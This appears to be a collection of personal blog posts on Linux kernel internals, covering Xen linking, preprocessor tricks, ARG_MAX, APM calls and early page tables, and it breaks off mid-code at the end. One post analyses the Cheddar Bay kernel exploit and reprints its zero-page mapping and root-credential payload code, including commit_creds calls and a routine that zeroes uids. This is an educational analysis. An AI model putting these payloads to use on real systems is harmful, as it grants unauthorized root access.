gcc / ld madness

November 7, 2012

So, I started reading [The Definitive Guide to the Xen Hypervisor] (again :P), and I thought it would be fun to start with the example guest kernel provided by the author, and extend it a bit (yeah, there’s mini-os already in extras/, but I wanted to struggle with all the peculiarities of extended inline asm, x86_64 asm, linker scripts, C macros etc. myself :P).

After doing some reading about x86_64 asm, I ‘ported’ the example kernel to 64-bit, and gave it a try. And of course, it crashed. While I was responsible for the first couple of crashes (for which, btw, I could write at least 2-3 additional blog posts :P), I got stuck on this error:

traps.c:470:d100 Unhandled bkpt fault/trap [#3] on VCPU 0 [ec=0000]
RIP:    e033:<0000000000002271>

when trying to boot the example kernel as a domU (under xen-unstable).

0x2000 is the address where Xen maps the hypercall page inside the domU’s address space. The guest crashed when trying to issue any hypercall (HYPERVISOR_console_io in this case). At first, I thought I had screwed up the x86_64 extended inline asm used to perform the hypercall, so I checked how the hypercall macros are implemented both in the Linux kernel (wow btw, it’s pretty scary) and in the mini-os kernel. But I got the same crash with both of them.
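For reference, issuing a hypercall on x86_64 boils down to something like the following (a sketch along the lines of the mini-os macros, not their exact code; the constants come from Xen’s public headers). Hypercall N lives at offset N * 32 inside the hypercall page, the first three arguments go in %rdi/%rsi/%rdx, and the result comes back in %rax:

#define __HYPERVISOR_console_io	18	/* from xen's public/xen.h */
#define CONSOLEIO_write		0

static inline long hypervisor_console_write(const char *buf, long len)
{
	long res, cmd = CONSOLEIO_write, cnt = len, ptr = (long)buf;

	/* console_io is hypercall 18, so we call hypercall_page + 18 * 32 */
	asm volatile("call hypercall_page + (18 * 32)"
		     : "=a" (res), "+D" (cmd), "+S" (cnt), "+d" (ptr)
		     :
		     : "memory", "rcx", "r11");
	return res;
}

(Note that with the page at 0x2000, the console_io entry should sit at 0x2000 + 18 * 32 = 0x2240, and the crashing RIP above, 0x2271, sits suspiciously close to 0x2030 + 18 * 32 = 0x2270, which is a pretty big hint of what follows.)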

After some more debugging, I made it work. In my Makefile, I used gcc to link all of the object files into the guest kernel. When I switched to ld, it worked. Apparently, when using gcc to link object files, it invokes the linker with a lot of options you might not want. Invoking gcc with the -v option reveals that gcc calls collect2 (a wrapper around the linker), which then calls ld with various options (certainly not only the ones I was passing to my ‘linker’). One of them was --build-id, which generates a .note.gnu.build-id ELF note section in the output file, containing a hash that identifies the linked file.
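You can see the full collect2/ld command line with something like:

gcc -v -o kernel head.o kernel.o 2>&1 | grep collect2

(the object file names here are made up, obviously). And, presumably, explicitly suppressing the note would also have done the trick:

gcc -Wl,--build-id=none -o kernel head.o kernel.o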

Apparently, this note changes the layout of the resulting ELF file, ‘shifting’ the .text section from 0x0 to 0x30, so hypercall_page ends up at 0x2030 instead of 0x2000. Thus, when I ‘called’ into the hypercall page, I ended up at some arbitrary location instead of the start of the specific hypercall handler I was going for. But it took me quite some time of debugging before I ran objdump -dS [kernel] (and objdump -x [kernel]), and found out what was going on.

The code from bootstrap.x86_64.S looks like this (notice the .org 0x2000 before the hypercall_page global symbol):

	.text
	.code64
	.globl	_start, shared_info, hypercall_page
_start:
	cld
	movq stack_start(%rip),%rsp
	movq %rsi,%rdi
	call start_kernel

stack_start:
	.quad stack + 8192

	.org 0x1000
shared_info:
	.org 0x2000

hypercall_page:
	.org 0x3000

One solution, mentioned earlier, is to switch to ld (which probably makes more sense) instead of using gcc. The other solution is to tweak the ELF file layout through the linker script (this is pretty much what the Linux kernel does to work around it):

OUTPUT_FORMAT("elf64-x86-64", "elf64-x86-64", "elf64-x86-64")
OUTPUT_ARCH(i386:x86-64)
ENTRY(_start)

PHDRS {
	text PT_LOAD FLAGS(5);		/* R_E */
	data PT_LOAD FLAGS(7);		/* RWE */
	note PT_NOTE FLAGS(0);		/* ___ */
}

SECTIONS
{
	. = 0x0;			/* Start of the output file */
	_text = .;			/* Text and ro data */
	.text : {
		*(.text)
	} :text = 0x9090 

	_etext = .;			/* End of text section */

	.rodata : {			/* ro data section */
		*(.rodata)
		*(.rodata.*)
	} :text

	.note : { 
		*(.note.*)
	} :note

	_data = .;
	.data : {			/* Data */
		*(.data)
	} :data

	_edata = .;			/* End of data section */	
}
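Either way, it’s easy to verify the resulting layout:

objdump -h kernel                # .text should now start at 0x0
nm kernel | grep hypercall_page  # should print 0000000000002000 T hypercall_page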

And now that my kernel boots, I can go back to copy-pasting code from the book … erm hacking. :P

Disclaimer: I’m not very familiar with lds scripts or x86_64 asm, so don’t trust this post too much. :P

Abusing the C preprocessor

August 29, 2011

Both tricks shown here are related to a change (by Peter Zijlstra) in the kmap_atomic() and kunmap_atomic() macros/functions. LWN has an excellent article about what that change involved. It basically ‘dropped’ support for atomic kmap slots, switching to a more general, stack-based approach.

Now, with this change, the number of arguments passed to the kmap_atomic() function changed too, and thus you’d end up with a huge patch covering the whole tree, changing every kmap_atomic(p, KM_TYPE) call to kmap_atomic(p).

But there was another way to go. Some C preprocessor magic.

#define kmap_atomic(page, args...) __kmap_atomic(page)

Yes, the C preprocessor supports variadic macros. :)
(Which I found out while going through the reptyr code, but I’ll talk about that in another post.)
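Here’s a toy version of the trick (hypothetical names, but it compiles):

#include <stdio.h>

static void *__kmap_atomic(void *page) { return page; }

/* old callers pass (page, KM_TYPE), new callers just (page);
 * any extra arguments are silently swallowed */
#define kmap_atomic(page, args...) __kmap_atomic(page)

int main(void)
{
	kmap_atomic((void *)0x1000);		/* new-style call */
	kmap_atomic((void *)0x1000, 42);	/* old-style call: still compiles */
	printf("both compile fine\n");
	return 0;
}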

Today, I saw a thread on the lkml which actually did the cleanup I described. Andrew Morton responded:

I’m OK with cleaning all these up, but I suggest that we leave the back-compatibility macros in place for a while, to make sure that various stragglers get converted. Extra marks will be awarded for working out how to make unconverted code generate a compile warning

And Nick Bowler responded with a very clever way to do this (which involved heavily abusing the C preprocessor :P):

  #include <stdio.h>

  int foo(int x)
  {
     return x;
  }

  /* Deprecated; call foo instead. */
  static inline int __attribute__((deprecated)) foo_unconverted(int x, int unused)
  {
     return foo(x);
  }

  #define PASTE(a, b) a ## b
  #define PASTE2(a, b) PASTE(a, b)
  
  #define NARG_(_9, _8, _7, _6, _5, _4, _3, _2, _1, n, ...) n
  #define NARG(...) NARG_(__VA_ARGS__, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0)

  #define foo1(...) foo(__VA_ARGS__)
  #define foo2(...) foo_unconverted(__VA_ARGS__)
  #define foo(...) PASTE2(foo, NARG(__VA_ARGS__)(__VA_ARGS__))

  int main(void)
  {
    printf("%d\n", foo(42));
    printf("%d\n", foo(54, 42));
    return 0;
  }

The actual warning is printed due to the deprecated attribute of the foo_unconverted() function.

The fun part, however, is how we get to use the foo ‘identifier’/name to call either foo() or foo_unconverted(), depending on the number of arguments given. :)

The trick is that __VA_ARGS__ ‘shifts’ the numbers 9-0 in the NARG macro: when the NARG_ macro gets called, _9 matches the first argument of __VA_ARGS__, _8 the second etc., and so n matches the actual number of arguments (I’m not sure I described it very well, but if you try doing it by hand, you’ll understand how it works).
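For example, expanding foo(54, 42) by hand:

NARG(54, 42)
  => NARG_(54, 42, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0)
  /*       _9  _8  _7 _6 _5 _4 _3 _2 _1  n  ... */
  => 2

and so foo(54, 42) becomes PASTE2(foo, 2 (54, 42)) => foo2(54, 42) => foo_unconverted(54, 42), which is what triggers the deprecation warning.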

Now that we have the number of arguments given to foo, we use the PASTE macro to ‘concatenate’ it with the function name, append the actual arguments, and thus call the appropriate wrapper macro (foo1, foo2 etc.).

Another interesting thing, which I didn’t know, is how macro arguments get expanded. For macros that concatenate (##) or stringify (#), the arguments are not expanded beforehand. That’s why we have to use PASTE2 as a wrapper: it gets the NARG() argument/macro fully expanded before the concatenation takes place.
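Compare, using the macros above:

PASTE(foo, NARG(42))	/* => fooNARG(42): the ## blocks the expansion of NARG */
PASTE2(foo, NARG(42))	/* => PASTE(foo, 1) => foo1 */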

Ok, C code can get at times a bit obfuscated, and yes you don’t have type safety etc etc, but, man, you can be really creative with the C language (and the C preprocessor)!
And the Linux kernel development(/-ers) prove just that. :)

For some reason, whenever I open up Wikipedia, I end up with tons of tabs in my web browser, and usually the tabs are completely unrelated to each other. :P

Yesterday, I ended up at the xargs Wikipedia article, where I found an interesting note:

Under the Linux kernel before version 2.6.23, arbitrarily long lists of parameters could not be passed to a command,[1] so xargs breaks the list of arguments into sublists small enough to be acceptable.

Along with a link to the GNU coreutils FAQ.

And from there a link to the Linux Kernel mainline git repository.

After a bit of googling, I found a very nice article describing in great detail the ARG_MAX variable, which defines the maximum length of the arguments passed to execve.

Traditionally Linux used a hardcoded:

#define MAX_ARG_PAGES 32

to limit the total size of the arguments passed to execve() (including the size of the ‘environment’). That limited the maximum length of the arguments to about 128KB (32 pages of 4KB each, minus the size of the ‘environment’).

(Note: actually, very early Linux kernels did not have support for ARG_MAX and didn’t use MAX_ARG_PAGES, but back then I was probably 2-3 years old, so it’s ancient history for me :P)

With Linux-2.6.23, this hardcoded limit was removed; actually, it was replaced by a more ‘flexible’ one. The maximum length of the arguments can now be as big as 1/4th of the user-space stack. For example, on my desktop, ulimit -s gives a stack size of 8192KB, which means a maximum length of 2097152 bytes for the arguments. You can obtain the same value using getconf ARG_MAX. Now, if I increase the soft limit on the stack size, the maximum length allowed will also increase, although with an 8192KB soft limit, ‘ARG_MAX’ is already big enough. Two new limits were also introduced: one on the maximum length of each individual argument (equal to PAGE_SIZE * 32), and one on the total number of arguments, equal to 0x7FFFFFFF, or as big as a signed integer can get.
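A trivial way to see the relation on a running system:

#include <stdio.h>
#include <unistd.h>
#include <sys/resource.h>

int main(void)
{
	struct rlimit rl;

	if (getrlimit(RLIMIT_STACK, &rl) == 0)
		printf("stack soft limit: %lu bytes\n",
		       (unsigned long)rl.rlim_cur);
	/* on >= 2.6.23 kernels this should be the soft limit / 4 */
	printf("_SC_ARG_MAX:      %ld bytes\n", sysconf(_SC_ARG_MAX));
	return 0;
}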

The Linux headers, however, use MAX_ARG_STRLEN, I think, as the ARG_MAX limit, which forces libc to #undef it in its own header files. I’m not sure, since I haven’t looked into the code yet, but at least for Linux, ARG_MAX is not statically defined by libc anymore (i.e. in a header file); instead, libc computes its value from the user-space stack size.
(edit: that’s indeed how it works for >= linux-2.6.23; the code from sysdeps/unix/sysv/linux/sysconf.c:

    case _SC_ARG_MAX:
  #if __LINUX_KERNEL_VERSION < 0x020617
        /* Determine whether this is a kernel 2.6.23 or later.  Only
           then do we have an argument limit determined by the stack
           size.  */
        if (GLRO(dl_discover_osversion) () >= 0x020617)
  #endif
          {
            /* Use getrlimit to get the stack limit.  */
            struct rlimit rlimit;
            if (__getrlimit (RLIMIT_STACK, &rlimit) == 0)
              return MAX (legacy_ARG_MAX, rlimit.rlim_cur / 4);
          }
  
        return legacy_ARG_MAX;

).

And the kernel code that enforces that limit:

               struct rlimit *rlim = current->signal->rlim;
               unsigned long size = bprm->vma->vm_end - bprm->vma->vm_start;

               /*
                * Limit to 1/4-th the stack size for the argv+env strings.
                * This ensures that:
                *  - the remaining binfmt code will not run out of stack space,
                *  - the program will have a reasonable amount of stack left
                *    to work from.
                */
               if (size > rlim[RLIMIT_STACK].rlim_cur / 4) {
                       put_page(page);
                       return NULL;
               }

The whole kernel patch is a bit too complicated for me to understand, since I haven’t dug much into the kernel mm code, but from what I understand, instead of copying the arguments into pages and then mapping those pages into the new process address space, it sets up a new mm_struct, and populates it with a stack VMA. It then copies the arguments into this VMA (expanding it as needed), and then takes care to ‘position’ it correctly in the new process. But since I’m not very familiar with the Linux kernel mm API, it’s very likely that what I said is totally wrong (I really have to read the mm chapters from “Understanding the Linux Kernel” :P).

A couple of months ago I found out about ketchup (credits to Daniel Drake, and his blog).

ketchup is an awesome utility/script, written by Matt Mackall in Python, which makes it very easy to manage kernel sources: you can very easily upgrade to a newer kernel version, downgrade to older releases, and even switch between different patchsets. The ketchup ebuild I found in Portage (like the packages of every other Linux distro I know of) was fetching the original, out-of-date version of ketchup. Steven Rostedt had pulled the original ketchup code (v0.9) into his git repo @ kernel.org, but there had been no commits/updates to ketchup for 1-2 years, I think.

So, I decided to clean up some of the old trees that ketchup supported but which are no longer maintained, and to add support for new trees (or updated ‘versions’ of the old ones). I sent the patches to Steven Rostedt, and he proposed that I take over and maintain ketchup. :)

I cloned the ketchup git repo to Github, applied the patches I’d written, plus quite a lot of patches that the Debian ketchup package provided.

Now, with the Linux-3.0 release approaching, I tried to add (at least) partial support for the new two-digit version numbers, but there are still some issues, which will hopefully get resolved once Linux-3.0 gets released and the new versioning scheme gets standardized (for example, the EXTRAVERSION Makefile variable will probably not get removed in 3.0, as that breaks some userspace utilities: uptime etc. from procps, some depmod issues, etc.).

The new code for 3.x kernels is currently in the linux-3 branch, from which I took a snapshot and pushed it to Portage as dev-util/ketchup-1.1_beta. I will hopefully merge it back into master after the first -stable release (Linux-3.0.1) comes out, just to make sure that everything works.

Feel free to give it a try, and report any bugs/issues.

Thanks to “Understanding the Linux Kernel”, I spent several hours trying to understand the APM code used to ‘call’ the APM Protected Mode 32-bit Interface Connect.
Of course, APM has been deprecated for ages, I think, but I was curious. :P

As the APM 1.2 specification states:

The APM BIOS 32-bit protected mode interface requires 3 consecutive
selector/segment descriptors for use as 32-bit code, 16-bit code, and data segments,
respectively. Both 32-bit and 16-bit code segment descriptors are necessary so the
APM BIOS 32-bit interface can call other BIOS routines in a 16-bit code segment if
necessary. The caller must initialize these descriptors using the segment base and
length information returned from this call to the APM BIOS. These selectors may
either be in the GDT or LDT, but must be valid when the APM BIOS is called in
protected mode.

So, at boot time, Linux will query the BIOS/APM for information about the base and length of the segments that the APM code uses (query_apm_bios()):

        /* 32-bit connect */
	ireg.al = 0x03;
	intcall(0x15, &ireg, &oreg);

	boot_params.apm_bios_info.cseg        = oreg.ax;
	boot_params.apm_bios_info.offset      = oreg.ebx;
	boot_params.apm_bios_info.cseg_16     = oreg.cx;
	boot_params.apm_bios_info.dseg        = oreg.dx;
	boot_params.apm_bios_info.cseg_len    = oreg.si;
	boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
	boot_params.apm_bios_info.dseg_len    = oreg.di;

These are the values that Linux will use to set up the appropriate segments in the Global Descriptor Table (GDT).

	/*
	 * Set up the long jump entry point to the APM BIOS, which is called
	 * from inline assembly.
	 */
	apm_bios_entry.offset = apm_info.bios.offset;
	apm_bios_entry.segment = APM_CS;
	/*
	 * The APM 1.1 BIOS is supposed to provide limit information that it
	 * recognizes.  Many machines do this correctly, but many others do
	 * not restrict themselves to their claimed limit.  When this happens,
	 * they will cause a segmentation violation in the kernel at boot time.
	 * Most BIOS's, however, will respect a 64k limit, so we use that.
	 *
	 * Note we only set APM segments on CPU zero, since we pin the APM
	 * code to that CPU.
	 */
	gdt = get_cpu_gdt_table(0);
	set_desc_base(&gdt[APM_CS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg << 4));
	set_desc_base(&gdt[APM_CS_16 >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg_16 << 4));
	set_desc_base(&gdt[APM_DS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.dseg << 4));

So, now the APM segments (or rather, their descriptors) are ready to use.

The code used to make an APM BIOS call looks like this:

static inline void apm_bios_call_asm(u32 func, u32 ebx_in, u32 ecx_in,
					u32 *eax, u32 *ebx, u32 *ecx,
					u32 *edx, u32 *esi)
{
	/*
	 * N.B. We do NOT need a cld after the BIOS call
	 * because we always save and restore the flags.
	 */
	__asm__ __volatile__(APM_DO_ZERO_SEGS
		"pushl %%edi\n\t"
		"pushl %%ebp\n\t"
		"lcall *%%cs:apm_bios_entry\n\t"
		"setc %%al\n\t"
		"popl %%ebp\n\t"
		"popl %%edi\n\t"
		APM_DO_POP_SEGS
		: "=a" (*eax), "=b" (*ebx), "=c" (*ecx), "=d" (*edx),
		  "=S" (*esi)
		: "a" (func), "b" (ebx_in), "c" (ecx_in)
		: "memory", "cc");
}

It took me a while to figure out the long call:

lcall *%%cs:apm_bios_entry

because apm_bios_entry is defined as:

static struct {
        unsigned long   offset;
        unsigned short  segment;
} apm_bios_entry;

At first I thought that the struct should be defined the other way around (first the segment, and then the offset).
I experimented a bit with inline asm, and after lots of segmentation faults, and some time going over the Intel x86 manuals about the ljmp instruction, I figured it out.

Well, I think it took much, much longer than it should have to understand what was going on. :S

The ljmp expects a mem16:mem32 operand, where mem16 is the segment, and mem32 the offset.
And that’s exactly how the struct apm_bios_entry is stored in memory.
However, as I ‘read’ mem16:mem32, I thought that mem16 should be stored before mem32. :S

And thus I lost several hours writing and experimenting with segfaulting C code. :P
For something pretty obvious…
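In hindsight, a trivial sanity check would have saved me most of those hours (I’m using unsigned int instead of unsigned long for the offset, to keep it 4 bytes on a 64-bit host too):

#include <stdio.h>
#include <stddef.h>

/* same layout as apm_bios_entry: the 32-bit offset sits at the lower
 * address, with the 16-bit segment right after it, which is exactly
 * the mem16:mem32 operand that ljmp/lcall expects */
struct far_ptr {
	unsigned int	offset;
	unsigned short	segment;
};

int main(void)
{
	printf("offset  at byte %zu\n", offsetof(struct far_ptr, offset));
	printf("segment at byte %zu\n", offsetof(struct far_ptr, segment));
	return 0;
}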

my first kernel patch!

March 11, 2011

Here it is! :P

Well, the patch itself isn’t a big deal, since I didn’t write any code. It was a cleanup of asm-offsets.

Afaik, Linux has quite a lot of assembly code, which needs the offsets of various struct members. Of course, assembly code (or even toplevel inline assembly) cannot use the offsetof macro. That’s also the case for some C constants, e.g.:

#define PAGE_SIZE (1UL << PAGE_SHIFT)

Thus, these offsets and constants are ‘calculated’ at build time as ‘absolute values’, so that gas is happy with them. :P
This is done using the macros defined in include/linux/kbuild.h:

#define DEFINE(sym, val) \
        asm volatile("\n->" #sym " %0 " #val : : "i" (val))

#define BLANK() asm volatile("\n->" : : )

#define OFFSET(sym, str, mem) \
	DEFINE(sym, offsetof(struct str, mem))

#define COMMENT(x) \
	asm volatile("\n->#" x)

the asm-offsets.c file is used to create a ‘special’ asm file, which is then parsed by the kernel build system, in order to create the include/generated/asm-offsets.h file.
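To illustrate the mechanism (a rough sketch, with a made-up offset value): an entry in asm-offsets.c like

	OFFSET(TASK_pid, task_struct, pid);

compiles (via gcc -S) into an assembly line along the lines of

	->TASK_pid $668 offsetof(struct task_struct, pid)

which the build system then turns (with sed) into

	#define TASK_pid 668 /* offsetof(struct task_struct, pid) */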

However, a patch introduced two new macros in include/linux/const.h:

#ifdef __ASSEMBLY__
#define _AC(X,Y)	X
#define _AT(T,X)	X
#else
#define __AC(X,Y)	(X##Y)
#define _AC(X,Y)	__AC(X,Y)
#define _AT(T,X)	((T)(X))
#endif

so that some constants defined in C work with gas too.
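So, for example, _AC(1,UL) expands to:

	(1UL)	/* when included from C code */
	1	/* when included from assembly, where __ASSEMBLY__ is defined */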

And now, PAGE_SIZE is defined as

#define PAGE_SIZE       (_AC(1,UL) << PAGE_SHIFT)

and thus the PAGE_SIZE_asm defined in x86/kernel/asm-offsets.c, and used in some places in the x86 code, was no longer needed (that’s also the case with PAGE_SHIFT and THREAD_SIZE).

So, I deleted PAGE_SIZE_asm/PAGE_SHIFT_asm/THREAD_SIZE_asm from x86/kernel/asm-offsets.c, and replaced them with their non-asm counterparts, in the code that used them.

I posted it to the lkml (after some hours of experimenting with git format-patch and git send-email :P), and it got accepted. :)

Here are some things I learned while reading the Linux kernel source code (some of which took me a couple of hours of googling and searching through documentation, git commit messages, threads on the lkml etc. :P).

1) You cannot write extended toplevel inline assembly, i.e. when you want to use extended inline assembly to pass the value of some C variables or constants, you can only do it inside a function. And as I found out, someone had already filed a bug about it in the GCC bugzilla. So something like this:

static const char foo[] = "Hello, world!";
enum { bar = 17 };
asm(".pushsection baz; .long %c0, %c1, %c2; .popsection"
    : : "i" (foo), "i" (sizeof(foo)), "i" (bar));

won’t work.

2) I didn’t search the documentation very much, but I couldn’t find the difference between %c0 and %0. Both are used in the example code above, and in a kernel macro I saw. I understood that it had to do with some ‘constant casting’, but I couldn’t find the exact difference anywhere. So I wrote a simple piece of code to clarify it:

int main(void)
{
	asm("movl %0, %%eax; movl %c0, %%eax"
		:: "i" (0xff));
	return 0;
}

and after

gcc -S foo.c

I get:

movl $255, %eax
movl 255, %eax

So, %0 is used when we want an integer constant as an immediate operand in instructions like mov, add etc., which means it gets prefixed with $, while %c0 is used when we want the bare number itself, for directives like .long, .size etc., which expect an absolute expression/value as their ‘argument’.

3) When using the section attribute on a variable, in order to change the section it belongs to, you cannot change the section’s type to nobits; it’ll be progbits by default. progbits means that the section actually gets space allocated inside the executable (like the text and data sections), in contrast to nobits sections, like bss for example.
I.e. you can’t do this:

static char foo __attribute__((section("bar", nobits)));

4) I also found out about the pushsection and popsection asm directives, which manipulate the ELF section stack, and seem to be very useful on certain occasions. pushsection obviously pushes the current section onto the section stack, and replaces it with the argument passed to the directive, while popsection replaces the current section with the section on top of the section stack.

5) Finally, the ‘used’ attribute, which indicates that the symbol (a function in our case) is actually used/called/referenced, even if the compiler can’t ‘see’ it (otherwise, I think compiler optimizations would omit code generation for that function).

And now a kernel macro which includes all of the above:

/*
 * Reserve space in the brk section.  The name must be unique within
 * the file, and somewhat descriptive.  The size is in bytes.  Must be
 * used at file scope.
 *
 * (This uses a temp function to wrap the asm so we can pass it the
 * size parameter; otherwise we wouldn't be able to.  We can't use a
 * "section" attribute on a normal variable because it always ends up
 * being @progbits, which ends up allocating space in the vmlinux
 * executable.)
 */
#define RESERVE_BRK(name,sz)						\
	static void __section(.discard.text) __used			\
	__brk_reservation_fn_##name##__(void) {				\
		asm volatile (						\
			".pushsection .brk_reservation,\"aw\",@nobits;" \
			".brk." #name ":"				\
			" 1:.skip %c0;"					\
			" .size .brk." #name ", . - 1b;"		\
			" .popsection"					\
			: : "i" (sz));					\
	}

And here’s a bit more detailed explanation, from the git commit:

The C definition of RESERVE_BRK() ends up being more complex than
one would expect to work around a cluster of gcc infelicities:

The first attempt was to simply try putting __section(.brk_reservation)
on a variable. This doesn’t work because it ends up making it a
@progbits section, which gets actual space allocated in the vmlinux
executable.

The second attempt was to emit the space into a section using asm,
but gcc doesn’t allow arguments to be passed to file-level asm()
statements, making it hard to pass in the size.

The final attempt is to wrap the asm() in a function to allow
it to have arguments, and put the function itself into the
.discard section, which vmlinux*.lds drops entirely from the
emitted vmlinux.

Another thing to notice is that the wrapper function is placed in the .discard.text section, which, according to vmlinux.lds (the linker script used to generate/link the vmlinux executable), gets discarded, and is thus not included in the executable.
From scripts/module-common.lds:

/*
 * Common module linker script, always used when linking a module.
 * Archs are free to supply their own linker scripts.  ld will
 * combine them automatically.
 */
SECTIONS {
	/DISCARD/ : { *(.discard) }
}

The purpose of the RESERVE_BRK macro, and of the brk-like allocator for very early memory allocations needed during the kernel boot process, is an interesting story too (which means another post coming soon)! ;)

Coolest hack/trick ever!

February 17, 2011

Some time ago, I wrote about lguest, a minimal x86 hypervisor for the Linux kernel, which is mainly used for experimentation, and for learning about hypervisors, operating systems, even computer architecture/ISAs (x86 in particular).

Today I cloned the git repo of the lguest64 port, and started browsing through the documentation and the code. In the launcher code (the program that initializes/sets up and launches a new guest kernel), I saw the coolest programming hack/trick I’ve seen in a long time. :P

/*L:170 Prepare to be SHOCKED and AMAZED.  And possibly a trifle nauseated.
 *
 * We know that CONFIG_PAGE_OFFSET sets what virtual address the kernel expects
 * to be.  We don't know what that option was, but we can figure it out
 * approximately by looking at the addresses in the code.  I chose the common
 * case of reading a memory location into the %eax register:
 *
 *  movl <some-address>, %eax
 *
 * This gets encoded as five bytes: "0xA1 <4-byte-address>".  For example,
 * "0xA1 0x18 0x60 0x47 0xC0" reads the address 0xC0476018 into %eax.
 *
 * In this example we can guess that the kernel was compiled with
 * CONFIG_PAGE_OFFSET set to 0xC0000000 (it's always a round number).  If the
 * kernel were larger than 16MB, we might see 0xC1 addresses show up, but our
 * kernel isn't that bloated yet.
 *
 * Unfortunately, x86 has variable-length instructions, so finding this
 * particular instruction properly involves writing a disassembler.  Instead,
 * we rely on statistics.  We look for "0xA1" and tally the different bytes
 * which occur 4 bytes later (the "0xC0" in our example above).  When one of
 * those bytes appears three times, we can be reasonably confident that it
 * forms the start of CONFIG_PAGE_OFFSET.
 *
 * This is amazingly reliable. */
static unsigned long intuit_page_offset(unsigned char *img, unsigned long len)
{
	unsigned int i, possibilities[256] = { 0 };

	for (i = 0; i + 4 < len; i++) {
		/* mov 0xXXXXXXXX,%eax */
		if (img[i] == 0xA1 && ++possibilities[img[i+4]] > 3)
			return (unsigned long)img[i+4] << 24;
	}
	errx(1, "could not determine page offset");
}

It’s very well commented, so I don’t think there’s anything I could explain better.
Very very nice trick!
‘Prepare to be shocked and amazed!’ ;)

Gimme root!

February 17, 2011

I was looking at the Linux kernel null-pointer dereference exploit in /dev/net/tun, aka Cheddar Bay :P, written by Brad Spengler, and I came across some things I hadn’t seen before.

In the pa__init function of the exploit, we try to mmap the zero page, and then we set it up accordingly in order to redirect to our “gimme root” code. :P

The piece of code for the mmap looks like this:

	if ((personality(0xffffffff)) != PER_SVR4) {
		mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
		if (mem != NULL) {
			fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
			return 1;
		}
	} else {
		ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
		if (ret == -1) {
			fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
			return 1;
		}
	}

Thus, I learned that the SVR4 personality (generally, any personality with the MMAP_PAGE_ZERO flag set) maps the zero page and fills it with zeros, and that’s why we use mprotect for SVR4, instead of mmap, since the zero page is already mapped.
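By the way, a trivial way to check what your current personality looks like:

#include <stdio.h>
#include <sys/personality.h>

int main(void)
{
	/* personality(0xffffffff) just queries the current personality */
	unsigned long persona = personality(0xffffffff);

	printf("personality:    %#lx\n", persona);
	printf("MMAP_PAGE_ZERO: %s\n",
	       (persona & MMAP_PAGE_ZERO) ? "set" : "not set");
	return 0;
}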

The gimme-root code was also fun (spender did his best to mock SELinux :P). However, the code that actually gives us root credentials is only 3 lines:

	if (commit_creds && init_cred) {
		/* hackish usage increment */
		*(volatile int *)(init_cred) += 1;
		commit_creds(init_cred);
		got_root = 1;
	}

where init_cred is the credential struct used by init (aka root :P), and commit_creds points to the kernel symbol/function which is used to manage credentials. spender gets the addresses of those symbols by parsing /proc/kallsyms. However, it seems that the init_cred symbol/struct is not exported, so instead maybe we could craft a new cred struct with uid/gid = 0, and then call prepare_creds/commit_creds.
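Actually, on kernels with the new cred API, the well-known payload does exactly that, without needing the init_cred symbol at all (a kernel-context sketch, not spender’s actual code):

#include <linux/cred.h>

static int give_root(void)
{
	/* prepare_kernel_cred(NULL) hands back a fresh copy of init_cred,
	 * so committing it gives the current task root credentials */
	struct cred *cred = prepare_kernel_cred(NULL);

	if (!cred)
		return -1;
	commit_creds(cred);
	return 0;
}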

Afaik, this credential ‘framework’ was introduced with Linux kernel 2.6.29, so spender provides another, ‘old-school’ :P way to get root credentials on older kernels:

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
	unsigned long current;

	asm volatile (
	" movl %%esp, %%eax;"
	" andl %1, %%eax;"
	" movl (%%eax), %0;"
	: "=r" (current)
	: "i" (0xfffff000)
	);
	return current;
}

static void old_style_gimme_root(void)
{
	unsigned int *current;
	unsigned long orig_current;

	current = (unsigned int *)get_current();
	orig_current = (unsigned long)current;

	while (((unsigned long)current < (orig_current + 0x1000)) &&
		(current[0] != our_uid || current[1] != our_uid ||
		 current[2] != our_uid || current[3] != our_uid))
		current++;

	if ((unsigned long)current >= (orig_current + 0x1000))
		return;

	current[0] = current[1] = current[2] = current[3] = 0; // uids
	current[4] = current[5] = current[6] = current[7] = 0; // gids

	got_root = 1;

	return;
}

which gets the current task’s stack, searches for our uids/gids, and then sets them all to 0 (aka root :P).

The exploit itself is brilliant, and LWN has two very nice articles which explain how the exploit actually works (although spender’s own comments are more than enough, covering Linux kernel security, full disclosure of security bugs etc. etc.).

I wanted to understand how the early page tables, which the kernel builds just before paging is enabled, actually work. x86 AT&T assembly isn’t very easy to understand, but it’s fun though. :P

page_pde_offset = (__PAGE_OFFSET >> 20);

        movl $pa(__brk_base), %edi
        movl $pa(swapper_pg_dir), %edx
        movl $PTE_IDENT_ATTR, %eax
10:
        leal PDE_IDENT_ATTR(%edi),%ecx          /* Create PDE entry */
        movl %ecx,(%edx)                        /* Store identity PDE entry */
        movl %ecx,page_pde_offset(%edx)         /* Store kernel PDE entry */
        addl $4,%edx
        movl $1024, %ecx
11:
        stosl
        addl $0x1000,%eax
        loop 11b
        /*
         * End condition: we must map up to the end + MAPPING_BEYOND_END.
         */
        movl $pa(_end) + MAPPING_BEYOND_END + PTE_IDENT_ATTR, %ebp
        cmpl %ebp,%eax
        jb 10b
        addl $__PAGE_OFFSET, %edi
        movl %edi, pa(_brk_end)
        shrl $12, %eax
        movl %eax, pa(max_pfn_mapped)

That’s the whole piece of code (from arch/x86/kernel/head_32.S).
Have fun! :)
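And for future reference, here’s how I read the loop, as a rough, runnable C model (the constants and array sizes are made-up stand-ins for the kernel symbols, so take it with a grain of salt):

#include <stdio.h>

#define PAGE_OFFSET	0xC0000000u	/* CONFIG_PAGE_OFFSET */
#define PTE_IDENT_ATTR	0x003u		/* present + rw */
#define PDE_IDENT_ATTR	0x007u		/* present + rw + user */
#define BRK_BASE	0x600000u	/* made-up pa(__brk_base) */
#define END_PADDR	0x800000u	/* made-up pa(_end) + MAPPING_BEYOND_END */

static unsigned int pg_dir[1024];		/* swapper_pg_dir (%edx) */
static unsigned int page_tables[4][1024];	/* the page tables built from the brk (%edi) */

int main(void)
{
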